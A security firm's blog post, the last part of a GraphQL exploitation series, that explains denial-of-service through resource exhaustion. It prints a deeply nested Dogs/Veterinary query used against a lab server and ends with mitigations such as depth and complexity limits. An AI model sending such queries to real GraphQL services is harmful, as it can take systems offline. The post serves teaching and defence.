We have finally reached the last part of the GraphQL exploitation series. If you are visiting this blog without going through previous parts, we recommend you to go through other parts as well.
Table of Contents
ToggleIn this blog, we will go through another possible vulnerability on GraphQL Server in which GraphQL could be vulnerable to resource exhaustion. Because the client has control over the amount of data requested, it can issue a GraphQL request to a query that causes resource exhaustion on the storage used by the GraphQL server, as well as on the GraphQL server for data serialisation to JSON.
This vulnerability not only affect Query operation, but it can also happen using mutation and subscription operations. When a large amount of data is sent in the parameters in mutation operation, it can cause a high level of CPU utilization at the server end to process it. When we register a large number of subscribers or send a large amount of data in the parameters using subscription then it can also trigger a high amount of CPU utilization.
To demonstrate this, we will try the same lab.
In this application there is a link between Dogs and Veterinary and vice versa, so, cascading calls might be made, producing resource depletion at the SQL level on the database.
Let’s formulate a big cascading Query like this.
query dos {
allDogs(onlyFree: false, limit: 1000000) {
id
name
veterinary {
id
name
dogs {
id
name
veterinary {
id
name
dogs {
id
name
veterinary {
id
name
dogs {
id
name
veterinary {
id
name
dogs {
id
name
veterinary {
id
name
dogs {
id
name
}
}
}
}
}
}
}
}
}
}
}
}
When we send this query to the server. The server starts using almost 100% of the CPU as shown below.
Remember to exploit query operation one must find a relation between two elements of database schema like here Dogs and Veterinary were related both ways.
Mitigation
For Query
The GraphQL developer needs to know about the security strategies to avoid such exploitation on any type of operator. Use the built-in protection offered for Maximum Query Depth & Query Complexity, depending on the GraphQL server implementation chosen.
For Mutation/Subscription:
- To limit the size of the incoming accepted data, use input validation.
- Limit the number of subscribers at the code level.
References
About Payatu
Payatu is a Research Focused, CERT-In impaneled Cybersecurity Consulting company specializing in security assessments of IoT product ecosystem, Web application & Network with a proven track record of securing applications and infrastructure for customers across 20+ countries.
Get in touch with us. Click on the get started button below.